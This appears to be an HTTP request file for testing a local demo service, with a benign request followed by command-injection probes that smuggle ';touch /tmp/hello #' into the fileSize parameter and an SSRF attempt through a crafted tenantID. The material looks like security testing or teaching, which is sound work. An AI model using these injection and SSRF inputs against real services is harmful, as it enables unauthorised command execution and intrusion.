### ✅ All Systems Go 
// Send a POST request with a JSON body to the specified URL
// This is a safe request to a local server

POST http://localhost:7000/cloudpawnery/image
    ?tenantID=3971533981712
    &fileID=fid-1f8b6b1e-1f8b-4b1e-8b6b-1e4b1e8b6b1e
    &fileSize=180
Content-Type: application/json

{}

### ⚠️ Careful Now: Can we do Command Injection?
// Send a POST request with a JSON body to the specified URL
// This is a safe request to a local server

POST http://localhost:7000/cloudpawnery/image
    ?tenantID=3971533981712
    &fileID=fid-1f8b6b1e-1f8b-4b1e-8b6b-1e4b1e8b6b1e
    &fileSize=;touch /tmp/hello #
Content-Type: application/json

{}

### ❌ Careful Now: Command Injection
// Send a POST request with a JSON body to the specified URL
// This is a safe request to a local server

POST http://localhost:7000/cloudpawnery/image
    ?tenantID=3971533981712
    &fileID=fid-1f8b6b1e-1f8b-4b1e-8b6b-1e4b1e8b6b1e
    &fileSize=%3Btouch%20%2Ftmp%2Fhello%20%23
Content-Type: application/json

{}

### ❌ Careful Now: SSRF
// Send a POST request with a JSON body to the specified URL
// This is a safe request to a local server

POST http://localhost:7000/cloudpawnery/image
    ?tenantID=:abc@example.com/app.json?url=
    &fileID=fid-1f8b6b1e-1f8b-4b1e-8b6b-1e4b1e8b6b1e
    &fileSize=;touch /tmp/hello #
Content-Type: application/json

{}